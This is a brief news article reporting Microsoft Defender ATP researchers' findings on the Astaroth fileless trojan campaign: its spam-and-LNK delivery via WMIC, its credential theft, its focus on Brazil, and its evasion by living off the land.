In a recent blog post, the Microsoft Defender ATP research team issued a warning about a harmful file-less malware campaign called Astaroth.
The team got alert when they noticed a sudden huge spike in the usage of the WMIC (Windows Management Instrumentation Command-Line) tool during the month of May and June 2019. They had deployed an algorithm designed to catch a specific form of file-less attack.
Soon, they uncovered a malware campaign where spam emails were being sent to users, and it included a link to a website hosting a .LNK shortcut file.
Downloading the file on the machine automatically runs the WMIC and tools which facilitate further operations and downloads the Astaroth trojan. The trojan is famous for stealing credentials from apps and dumping them on remote servers.
The Astaroth Trojan was previously detected in 2018, and then earlier this year when it targeted users in Brazil and Europe. As per ZDNet, Microsoft researchers have said that this time also around 90% of Astaroth infections have occurred in Brazil. Also, the malware used almost the same tools as in previous instances.
The big concern regarding Astaroth is that it is a file-less malware which means all of its operations happen in the system memory instead of the hard drive. This makes it harder for antivirus and other security tools to detect it and take some action.
Further, Astaroth employs a “living-off-the-land” approach where almost all of the resources and tools it consumes are already available on the target machine in the form of system apps.